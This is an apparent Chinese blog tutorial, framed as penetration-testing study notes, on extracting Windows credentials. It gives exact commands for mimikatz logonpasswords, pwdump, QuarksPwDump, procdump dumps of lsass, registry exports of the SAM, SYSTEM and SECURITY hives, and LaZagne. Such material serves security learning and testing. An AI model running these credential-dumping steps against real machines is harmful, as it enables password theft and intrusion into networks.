【内网学习】3.windows hash抓取

目录

6.1 mimikatz

6.2 wce

6.3PwDump

6.4 Quarks PwDump

6.5 prcodump+mimikatz

6.6 注册表+mimikatz

6.7 LaZagne


1 mimikatz

工具下载地址:Releases · gentilkiwi/mimikatz · GitHub

在cmd的命令里输入

privilege::debug    //提升权限
sekurlsa::logonpasswords    //抓取密码

结果如下,直接爆出来了明文,

2 wce

一直不能运行,暂存

3PwDump

工具下载地址:Windows PWDUMP tools

保证这两个文件在同一目录下,然后管理员运行cmd,pwdump7 运行结果如下:

pwdump8下载下来没有libeay32.dll文件,我把这个文件copy过来,放在与pwdump8.exe同一目录下,运行结果如下,可以发现pwdump8比pwdump7多了域的信息,加上了lm hash的值(这个值其实也没什么用,因为aad3b435b51404eeaad3b435b51404ee是lm hash被禁用后的默认值)

4 Quarks PwDump

Quarks PwDump 是一款开放源代码的Windows用户凭据提取工具,它可以抓取windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和Bitlocker。

PwDump支持的操作系统为Windows XP/Windows 2003/Windows Vista/Windows 7/Windows 2008/Windows 8。在Windows的密码系统中,密码以加密的方式保存在/windows/system32/config/下的sam文件里,而账号在登录后会将密码的密文和明文保存在系统的内存中。正常情况下系统启动后,sam文件是不能被读取的,但是PwDump就能读取sam.

(1)QuarksPwDump.exe参数说明:

-dhl 导出本地哈希值

-dhdc导出内存中的域控哈希值

-dhd 导出域控哈希值,必须指定NTDS文件

-db 导出Bitlocker信息,必须指定NTDS文件

-nt 导出ntds文件

-hist 导出历史信息,可选项

-t 导出类型可选默认导出为John类型。

-o 导出文件到本地

(2)、执行抓取用户密码的命令quarksPwDump.exe --dump-hash-local -o hash.txt,我们将抓取到的本地用户的密码保存到本地目录下的hash.txt中,保存的位置以及文件名自己可以设置:

quarksPwDump.exe --dump-hash-local -o hash.txt

5 prcodump+mimikatz

procdump,官方工具(意味着不会被当成病毒杀了),可将lsass.exe转储成dmp文件

procdump.exe -accepteula -ma lsass.exe lsass.dmp   #32位系统
procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp #64位系统

然后用mimikatz读取,如果没有mimiatz,就要将dmp文件拖到本机上读取。

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full

6 注册表+mimikatz

先通过系统行命令导出如下三个文件:

reg save hklm\sam sam.hive       
reg save hklm\system system.hive
reg save hklm\security security.hive

然后在本地上就可以用mimikatz来读取这三个文件

lsadump::sam /sam:sam.hive /system:system.hive /security:security.hive

7 LaZagne

LaZagne 是用于获取存储在本地计算机上的大量密码的开源应用程序。每个软件都使用不同的技术(纯文本、API、自定义算法、数据库等)存储其密码。LaZagne 的作用就是找到最常用的一些软件的密码。
LaZagne 几乎支持市面上大部分常用工具。包括浏览器、Git、SVN、Wifi、Databases 等。但是对聊天软件的支持不够本土化,主要支持一些国外的聊天软件。

LaZagne 自身基于py,跨平台性相对较好。但是有时候如果目标机器上没有 py 环境,我们可以把 py 转换成 exe 扔到目标机器上。

下载链接:https://github.com/AlessandroZ/LaZagne

Release 2.4.3 · AlessandroZ/LaZagne · GitHub

建议还是使用exe,py的需要安一堆依赖

pip install -r requirements.txt

我这里直接使用exe的

 参考链接:

几种windows本地hash值获取和破解详解

内网渗透:获取Windows内Hash密码方法总结

  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值